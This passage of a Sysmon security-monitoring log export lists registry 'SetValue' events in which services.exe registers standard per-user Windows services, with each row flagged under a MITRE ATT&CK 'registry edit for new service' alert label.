10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3f520\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3f520\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:55:18.377",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.972889200Z"",""eventRecordID"":""655"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.349",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.972525700Z"",""eventRecordID"":""654"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.321",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.971222500Z"",""eventRecordID"":""653"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:55:18.313",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.970693800Z"",""eventRecordID"":""652"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.287",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.969829000Z"",""eventRecordID"":""651"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:55:18.282",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.969532000Z"",""eventRecordID"":""650"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.224",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.968282400Z"",""eventRecordID"":""649"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 26, 2020 @ 10:55:18.215",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.967773800Z"",""eventRecordID"":""648"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.157",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.966049900Z"",""eventRecordID"":""647"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f520\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 26, 2020 @ 10:55:18.112",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.965673100Z"",""eventRecordID"":""646"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.068",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.964518900Z"",""eventRecordID"":""645"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:55:18.053",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.964223800Z"",""eventRecordID"":""644"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.038",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.962710800Z"",""eventRecordID"":""643"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.022",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.962366200Z"",""eventRecordID"":""642"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3f520\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3f520\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3f520\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:55:17.979",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.960769000Z"",""eventRecordID"":""641"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 26, 2020 @ 10:55:17.948",9,"ATT&CK T1058:Registry edit for new 
